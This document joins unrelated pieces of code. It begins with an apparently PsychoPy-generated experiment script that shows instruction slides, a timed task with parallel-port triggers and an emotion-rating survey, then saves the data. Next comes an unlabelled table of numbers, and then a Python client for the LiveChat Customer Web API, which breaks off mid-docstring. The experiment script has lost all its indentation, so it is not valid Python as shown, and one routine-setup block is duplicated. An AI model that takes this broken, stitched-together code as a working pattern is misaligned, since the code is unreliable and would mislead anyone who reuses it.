# abbreviate parameter names if possible (e.g. rgb = thisTask_intro_loop.rgb)
if thisTask_intro_loop != None:
    for paramName in thisTask_intro_loop.keys():
        exec(paramName + '= thisTask_intro_loop.' + paramName)
for thisTask_intro_loop in task_intro_loop:
currentLoop = task_intro_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_intro_loop.rgb)
if thisTask_intro_loop != None:
for paramName in thisTask_intro_loop.keys():
exec(paramName + '= thisTask_intro_loop.' + paramName)
# ------Prepare to start Routine "task_introduction"-------
t = 0
task_introductionClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
task_intro_key = event.BuilderKeyResponse()
task_intro_image.setImage("Instructions/png/tintro-%s.png"%(intro_repeat))
task_intro_sound.setSound("Instructions/wav/tintro-%s.wav"%(intro_repeat))
# keep track of which components have finished
task_introductionComponents = [task_intro_image, task_intro_key, task_intro_sound]
for thisComponent in task_introductionComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "task_introduction"-------
while continueRoutine:
# get current time
t = task_introductionClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *task_intro_image* updates
if t >= 0.0 and task_intro_image.status == NOT_STARTED:
# keep track of start time/frame for later
task_intro_image.tStart = t
task_intro_image.frameNStart = frameN # exact frame index
task_intro_image.setAutoDraw(True)
# *task_intro_key* updates
if t >= 0.0 and task_intro_key.status == NOT_STARTED:
# keep track of start time/frame for later
task_intro_key.tStart = t
task_intro_key.frameNStart = frameN # exact frame index
task_intro_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if task_intro_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop task_intro_sound
if t >= 0.0 and task_intro_sound.status == NOT_STARTED:
# keep track of start time/frame for later
task_intro_sound.tStart = t
task_intro_sound.frameNStart = frameN # exact frame index
task_intro_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in task_introductionComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "task_introduction"-------
for thisComponent in task_introductionComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
task_intro_sound.stop() # ensure sound has stopped at end of routine
intro_repeat = intro_repeat+1
# the Routine "task_introduction" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 5 repeats of 'task_intro_loop'
# set up handler to look after randomisation of conditions etc
task_block = data.TrialHandler(nReps=4, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='block')
thisExp.addLoop(task_block) # add the loop to the experiment
thisTask_block = task_block.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_block.rgb)
if thisTask_block != None:
for paramName in thisTask_block.keys():
exec(paramName + '= thisTask_block.' + paramName)
#---------------block loop
#create block list and shuffle
#list of block types, instruction slides, and ttls
lblockType = [['b0',7,3],['b1',6,4],['b2',7,5],['b3',8,6]]
random.shuffle(lblockType)
blockNum=0 #block counter
for thisTask_block in task_block:
#get block type then pop list
blockType = lblockType.pop(0)
#get ttl
ttlNum = blockType[2]
#print block info; single-argument print() form works under both Python 2
#and Python 3, matching the print(...) calls used later in this script
print('blockType: %s' % (blockType[0]))
print('blockNum: %s' % (blockNum))
#loop
currentLoop = task_block
# abbreviate parameter names if possible (e.g. rgb = thisTask_block.rgb)
if thisTask_block != None:
for paramName in thisTask_block.keys():
exec(paramName + '= thisTask_block.' + paramName)
# set up handler to look after randomisation of conditions etc
task_inst_loop = data.TrialHandler(nReps=blockType[1], method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='inst_loop')
thisExp.addLoop(task_inst_loop) # add the loop to the experiment
thisTask_inst_loop = task_inst_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_inst_loop.rgb)
if thisTask_inst_loop != None:
for paramName in thisTask_inst_loop.keys():
exec(paramName + '= thisTask_inst_loop.' + paramName)
inst_repeat = 0
#---------------task instructions loop
for thisTask_inst_loop in task_inst_loop:
currentLoop = task_inst_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_inst_loop.rgb)
if thisTask_inst_loop != None:
for paramName in thisTask_inst_loop.keys():
exec(paramName + '= thisTask_inst_loop.' + paramName)
# ------Prepare to start Routine "instructions"-------
t = 0
instructionsClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
inst_key = event.BuilderKeyResponse()
inst_image.setImage("Instructions/png/%s-%s.png"%(blockType[0],inst_repeat))
#prevent loading of inst_sound for first slide
if not (inst_repeat== 0):
inst_sound.setSound("Instructions/wav/%s-%s.wav"%(blockType[0],inst_repeat))
instructionsComponents = [inst_image, inst_key, inst_sound]
else:
instructionsComponents = [inst_image, inst_key]
for thisComponent in instructionsComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "instructions"-------
while continueRoutine:
# get current time
t = instructionsClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *inst_image* updates
if t >= 0.0 and inst_image.status == NOT_STARTED:
# keep track of start time/frame for later
inst_image.tStart = t
inst_image.frameNStart = frameN # exact frame index
inst_image.setAutoDraw(True)
# *inst_key* updates
if t >= 0.0 and inst_key.status == NOT_STARTED:
# keep track of start time/frame for later
inst_key.tStart = t
inst_key.frameNStart = frameN # exact frame index
inst_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if inst_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
#prevent loading of inst_sound for first slide
if not (inst_repeat== 0):
# start/stop inst_sound
if t >= 0.0 and inst_sound.status == NOT_STARTED:
# keep track of start time/frame for later
inst_sound.tStart = t
inst_sound.frameNStart = frameN # exact frame index
inst_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in instructionsComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "instructions"-------
for thisComponent in instructionsComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
#prevent loading of inst_sound for first slide
if not (inst_repeat== 0):
inst_sound.stop() # ensure sound has stopped at end of routine
inst_repeat = inst_repeat+1
# the Routine "instructions" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 5 repeats of 'task_inst_loop'
# ------Prepare to start Routine "task"-------
t = 0
t_0 = 0
t_1 = 0
taskClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(stim_duration)
# update component parameters for each repeat
# keep track of which components have finished
taskComponents = [task_image]
for thisComponent in taskComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "task"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = taskClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *task_image* updates
if t >= 0.0 and task_image.status == NOT_STARTED:
# keep track of start time/frame for later
task_image.tStart = t
task_image.frameNStart = frameN # exact frame index
task_image.setAutoDraw(True)
frameRemains = 0.0 + stim_duration- win.monitorFramePeriod * 0.75 # most of one frame period left
if task_image.status == STARTED and t >= frameRemains:
task_image.setAutoDraw(False)
#task trigger
t = taskClock.getTime()
t_1 = t
pport.setData(int(0))
if (t_1 - t_0) >= .500:
pport.setData(int(ttlNum))
t_0 = t
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in taskComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "task"-------
for thisComponent in taskComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# set up handler to look after randomisation of conditions etc
task_relax_loop = data.TrialHandler(nReps=2, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='relax_loop')
thisExp.addLoop(task_relax_loop) # add the loop to the experiment
thisTask_relax_loop = task_relax_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_relax_loop.rgb)
if thisTask_relax_loop != None:
for paramName in thisTask_relax_loop.keys():
exec(paramName + '= thisTask_relax_loop.' + paramName)
relax_repeat = 0
for thisTask_relax_loop in task_relax_loop:
currentLoop = task_relax_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_relax_loop.rgb)
if thisTask_relax_loop != None:
for paramName in thisTask_relax_loop.keys():
exec(paramName + '= thisTask_relax_loop.' + paramName)
# ------Prepare to start Routine "relax"-------
t = 0
relaxClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
relax_key = event.BuilderKeyResponse()
relax_image.setImage("Instructions/png/r-%s.png"%(relax_repeat))
relax_sound.setSound("Instructions/wav/r-%s.wav"%(relax_repeat))
# keep track of which components have finished
relaxComponents = [relax_image, relax_key, relax_sound]
for thisComponent in relaxComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# ------Prepare to start Routine "relax"-------
t = 0
relaxClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
relax_key = event.BuilderKeyResponse()
relax_image.setImage("Instructions/png/r-%s.png"%(relax_repeat))
relax_sound.setSound("Instructions/wav/r-%s.wav"%(relax_repeat))
# keep track of which components have finished
relaxComponents = [relax_image, relax_key, relax_sound]
for thisComponent in relaxComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "relax"-------
while continueRoutine:
# get current time
t = relaxClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *relax_image* updates
if t >= 0.0 and relax_image.status == NOT_STARTED:
# keep track of start time/frame for later
relax_image.tStart = t
relax_image.frameNStart = frameN # exact frame index
relax_image.setAutoDraw(True)
# *relax_key* updates
if t >= 0.0 and relax_key.status == NOT_STARTED:
# keep track of start time/frame for later
relax_key.tStart = t
relax_key.frameNStart = frameN # exact frame index
relax_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if relax_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop relax_sound
if t >= 0.0 and relax_sound.status == NOT_STARTED:
# keep track of start time/frame for later
relax_sound.tStart = t
relax_sound.frameNStart = frameN # exact frame index
relax_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in relaxComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "relax"-------
for thisComponent in relaxComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
relax_sound.stop() # ensure sound has stopped at end of routine
relax_repeat = relax_repeat+1
# the Routine "relax" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
task_survey_loop = data.TrialHandler(nReps=7, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='survey_loop')
thisExp.addLoop(task_survey_loop) # add the loop to the experiment
thisTask_survey_loop = task_survey_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_survey_loop.rgb)
if thisTask_survey_loop != None:
for paramName in thisTask_survey_loop.keys():
exec(paramName + '= thisTask_survey_loop.' + paramName)
#reset survey
lsurvey = ['anger','discomfort','disgust','fear','happiness','interest','sadness']#list of questions types
random.shuffle(lsurvey)
print(lsurvey)
for thisTask_survey_loop in task_survey_loop:
currentLoop = task_survey_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_survey_loop.rgb)
if thisTask_survey_loop != None:
for paramName in thisTask_survey_loop.keys():
exec(paramName + '= thisTask_survey_loop.' + paramName)
# ------Prepare to start Routine "survey"-------
t = 0
surveyClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
surveyType = lsurvey.pop(0)
survey_image.setImage("Instructions/png/%s.png"%(surveyType))
survey_key = event.BuilderKeyResponse()
# keep track of which components have finished
surveyComponents = [survey_image, survey_key]
for thisComponent in surveyComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "survey"-------
while continueRoutine:
# get current time
t = surveyClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *survey_image* updates
if t >= 0.0 and survey_image.status == NOT_STARTED:
# keep track of start time/frame for later
survey_image.tStart = t
survey_image.frameNStart = frameN # exact frame index
survey_image.setAutoDraw(True)
# *survey_key* updates
if t >= 0.0 and survey_key.status == NOT_STARTED:
# keep track of start time/frame for later
survey_key.tStart = t
survey_key.frameNStart = frameN # exact frame index
survey_key.status = STARTED
# keyboard checking is just starting
win.callOnFlip(survey_key.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if survey_key.status == STARTED:
theseKeys = event.getKeys(keyList=numpad_list)
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
if survey_key.keys == []: # then this was the first keypress
survey_key.keys = theseKeys[0] # just the first key pressed
survey_key.rt = survey_key.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in surveyComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "survey"-------
for thisComponent in surveyComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if survey_key.keys in ['', [], None]: # No response was made
survey_key.keys=None
task_survey_loop.addData('survey_key.keys',survey_key.keys)
if survey_key.keys != None: # we had a response
task_survey_loop.addData('survey_key.rt', survey_key.rt)
# the Routine "survey" was not non-slip safe, so reset the non-slip timer
task_survey_loop.addData('surveyType', surveyType)
task_survey_loop.addData('blockType', blockType[0])
routineTimer.reset()
thisExp.nextEntry()
print(survey_key.keys)
blockNum = blockNum + 1
# completed 5 repeats of 'task_block'
# ------Prepare to start Routine "Finish"-------
t = 0
FinishClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(15.000000)
# update component parameters for each repeat
finish_sound.setSound("Instructions/wav/finish-0.wav")
# keep track of which components have finished
FinishComponents = [finish_image, finish_sound]
for thisComponent in FinishComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "Finish"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = FinishClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *finish_image* updates
if t >= 0.0 and finish_image.status == NOT_STARTED:
# keep track of start time/frame for later
finish_image.tStart = t
finish_image.frameNStart = frameN # exact frame index
finish_image.setAutoDraw(True)
frameRemains = 0.0 + 15- win.monitorFramePeriod * 0.75 # most of one frame period left
if finish_image.status == STARTED and t >= frameRemains:
finish_image.setAutoDraw(False)
# start/stop finish_sound
if t >= 0.0 and finish_sound.status == NOT_STARTED:
# keep track of start time/frame for later
finish_sound.tStart = t
finish_sound.frameNStart = frameN # exact frame index
finish_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in FinishComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "Finish"-------
for thisComponent in FinishComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
finish_sound.stop() # ensure sound has stopped at end of routine
# Final teardown: persist data explicitly, then close the window and exit.
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
# flush any buffered log messages to disk before the process exits
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 43.84965
| 110
| 0.624735
| 7,467
| 62,705
| 5.135931
| 0.064819
| 0.003129
| 0.017523
| 0.003781
| 0.867718
| 0.852829
| 0.847093
| 0.818801
| 0.787014
| 0.784276
| 0
| 0.01245
| 0.2865
| 62,705
| 1,429
| 111
| 43.880336
| 0.844725
| 0.29146
| 0
| 0.765263
| 0
| 0
| 0.053797
| 0.015088
| 0
| 0
| 0.000138
| 0
| 0
| 0
| null | null | 0
| 0.007368
| null | null | 0.010526
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2107472ec7c6980119503f82549599a56180004b
| 58,994
|
py
|
Python
|
livechat/customer/web/client.py
|
livechat/lc-sdk-python
|
536483590b9600ef1bc86fe36a1f810368b85a9d
|
[
"Apache-2.0"
] | 5
|
2021-03-22T19:22:05.000Z
|
2022-01-18T13:38:22.000Z
|
livechat/customer/web/client.py
|
livechat/lc-sdk-python
|
536483590b9600ef1bc86fe36a1f810368b85a9d
|
[
"Apache-2.0"
] | 5
|
2021-10-05T14:44:33.000Z
|
2022-02-16T07:33:51.000Z
|
livechat/customer/web/client.py
|
livechat/lc-sdk-python
|
536483590b9600ef1bc86fe36a1f810368b85a9d
|
[
"Apache-2.0"
] | null | null | null |
''' Customer Web client implementation. '''
# pylint: disable=W0613,R0913,W0622,C0103
from __future__ import annotations
import typing
from abc import ABCMeta
import httpx
from livechat.utils.helpers import prepare_payload
from livechat.utils.httpx_logger import HttpxLogger
# pylint: disable=R0903
class CustomerWeb:
    ''' Allows retrieval of client for specific Customer Web
        API version. '''
    @staticmethod
    def get_client(license_id: int = None,
                   access_token: str = None,
                   version: str = '3.3',
                   base_url: str = 'api.livechatinc.com',
                   http2: bool = False,
                   organization_id: str = None) -> CustomerWebInterface:
        ''' Returns client for specific API version.

        Args:
            license_id (int): License ID. Required to use API v3.3.
            access_token (str): Full token with type (Bearer/Basic) that will be
                used as `Authorization` header in requests to API.
            version (str): API's version. Defaults to `3.3`.
            base_url (str): API's base url. Defaults to `api.livechatinc.com`.
            http2 (bool): A boolean indicating if HTTP/2 support should be
                enabled. Defaults to `False`.
            organization_id (str): Organization ID, which replaced license ID
                in v3.4.

        Returns:
            API client object for specified version based on
            `CustomerWebApiInterface`.

        Raises:
            ValueError: If the specified version does not exist.
        '''
        # Keyword arguments shared by every supported API version.
        common_kwargs = {
            'access_token': access_token,
            'version': version,
            'url': base_url,
            'http2': http2,
        }
        # Per-version client class plus its version-specific identifier kwarg
        # (v3.3 keys clients by license, v3.4 by organization).
        versions = {
            '3.3': (CustomerWeb33, {'license_id': license_id}),
            '3.4': (CustomerWeb34, {'organization_id': organization_id}),
        }
        if version not in versions:
            raise ValueError('Provided version does not exist.')
        client_class, version_kwargs = versions[version]
        return client_class(**{**common_kwargs, **version_kwargs})
class CustomerWebInterface(metaclass=ABCMeta):
''' Main class containing API methods. '''
def __init__(self, access_token: str, version: str, base_url: str,
http2: bool) -> CustomerWebInterface:
logger = HttpxLogger()
self.api_url = f'https://{base_url}/v{version}/customer/action'
if all([access_token, isinstance(access_token, str)]):
self.session = httpx.Client(
http2=http2,
headers={'Authorization': access_token},
event_hooks={
'request': [logger.log_request],
'response': [logger.log_response]
})
else:
raise ValueError(
'Incorrect or missing `access_token` argument (should be of type str.)'
)
self.query_string = None # overwritten in concrete classes.
def modify_header(self, header: dict) -> None:
''' Modifies provided header in session object.
Args:
header (dict): Header which needs to be modified.
'''
self.session.headers.update(header)
def remove_header(self, key: str) -> None:
''' Removes provided header from session object.
Args:
key (str): Key which needs to be removed from the header.
'''
if key in self.session.headers:
del self.session.headers[key]
def get_headers(self) -> dict:
''' Returns current header values in session object.
Returns:
dict: Response which presents current header values in session object.
'''
return dict(self.session.headers)
# Chats
def list_chats(self,
limit: int = None,
sort_order: str = None,
page_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns summaries of the chats a Customer participated in.
Args:
limit (int): Limit of results per page. Default: 10, maximum: 25.
sort_order (str): Possible values: asc, desc (default).
Chat summaries are sorted by the creation date of its last thread.
page_id (str): ID of the page with paginated results.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/list_chats{self.query_string}',
json=payload,
headers=headers)
def list_threads(self,
chat_id: str = None,
limit: str = None,
sort_order: str = None,
page_id: str = None,
min_events_count: int = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns threads that the current Customer has access to in a given chat.
Args:
chat_id (str): ID of the chat for which threads are to be listed.
limit (str): Limit of results per page. Default: 10, maximum: 25.
sort_order (str): Possible values: asc, desc (default).
Chat summaries are sorted by the creation date of its last thread.
page_id (str): ID of the page with paginated results.
min_events_count (int): Range: 1-100;
Specifies the minimum number of events to be returned in the response.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/list_threads{self.query_string}',
json=payload,
headers=headers)
def get_chat(self,
chat_id: str = None,
thread_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns a thread that the current Customer has access to in a given chat.
Args:
chat_id (str): ID of the chat for which thread is to be returned.
thread_id (str): ID of the thread to show. Default: the latest thread (if exists)
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(f'{self.api_url}/get_chat{self.query_string}',
json=payload,
headers=headers)
def start_chat(self,
chat: dict = None,
active: bool = None,
continuous: bool = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Starts a chat.
Args:
chat (dict): Dict containing chat properties, access and thread.
active (bool): When set to False, creates an inactive thread; default: True.
continuous (bool): Starts chat as continuous (online group is not required); default: False.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/start_chat{self.query_string}',
json=payload,
headers=headers)
def resume_chat(self,
chat: dict = None,
active: bool = None,
continuous: bool = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Restarts an archived chat.
Args:
chat (dict): Dict containing chat properties, access and thread.
active (bool): When set to False, creates an inactive thread; default: True.
continuous (bool): Starts chat as continuous (online group is not required); default: False.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/resume_chat{self.query_string}',
json=payload,
headers=headers)
def deactivate_chat(self,
id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Deactivates a chat by closing the currently open thread.
Sending messages to this thread will no longer be possible.
Args:
id (str): ID of chat to be deactivated.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/deactivate_chat{self.query_string}',
json=payload,
headers=headers)
# Configuration
def get_dynamic_configuration(self,
                              group_id: int = None,
                              url: str = None,
                              channel_type: str = None,
                              test: bool = None,
                              payload: dict = None,
                              headers: dict = None) -> httpx.Response:
    ''' Fetches the dynamic configuration of a given group.

        The returned data is what `get_configuration` and
        `get_localization` need as their inputs.

        Args:
            group_id (int): Group to fetch the dynamic configuration for;
                the default group is used when omitted.
            url (str): URL to fetch the dynamic configuration for.
            channel_type (str): Channel type to fetch the dynamic
                configuration for.
            test (bool): Treats the request as a test.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/get_dynamic_configuration{self.query_string}',
        json=request_json,
        headers=headers)
def get_configuration(self,
                      group_id: int = None,
                      version: str = None,
                      payload: dict = None,
                      headers: dict = None) -> httpx.Response:
    ''' Fetches a group's configuration in a given version.

        The response holds the data the Chat Widget is built from.

        Args:
            group_id (int): Group to fetch the configuration for.
            version (str): Configuration version, as returned by
                `get_dynamic_configuration` in `config_version`.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/get_configuration{self.query_string}',
        json=request_json,
        headers=headers)
# Events
def send_event(self,
               chat_id: str = None,
               event: dict = None,
               attach_to_last_thread: bool = None,
               payload: dict = None,
               headers: dict = None) -> httpx.Response:
    ''' Sends an Event object (e.g. a Message event) to a chat.

        Also updates the requester's `events_seen_up_to` as if they had
        seen all chat events.

        Args:
            chat_id (str): ID of the chat to send the event to.
            event (dict): The event object.
            attach_to_last_thread (bool): Ignored for active chats.
                For inactive chats: True attaches the event to the last
                thread, False makes the request fail. Default: False.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/send_event{self.query_string}',
        json=request_json,
        headers=headers)
def upload_file(self,
                file: typing.BinaryIO = None,
                headers: dict = None) -> httpx.Response:
    ''' Uploads a file to the server as a temporary file.

        The server returns a URL that expires after 24 hours unless the
        URL is used in `send_event`.

        Args:
            file (typing.BinaryIO): File-like object with the file to
                upload (maximum size: 10MB).
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.

        Raises:
            ValueError: If `file` is not provided.
    '''
    # Fail fast with a clear error instead of the AttributeError that
    # `None.read()` would raise when the default argument is left unset.
    if file is None:
        raise ValueError('`file` argument is required')
    return self.session.post(
        f'{self.api_url}/upload_file{self.query_string}',
        content=file.read(),
        headers=headers)
def send_rich_message_postback(self,
                               chat_id: str = None,
                               event_id: str = None,
                               postback: dict = None,
                               thread_id: str = None,
                               payload: dict = None,
                               headers: dict = None) -> httpx.Response:
    ''' Sends a rich message postback.

        Args:
            chat_id (str): ID of the chat to send the postback to.
            event_id (str): ID of the event the postback relates to.
            postback (dict): Postback data (id, toggled).
            thread_id (str): ID of the thread to send the postback to.
            payload (dict): Custom request payload; when provided it
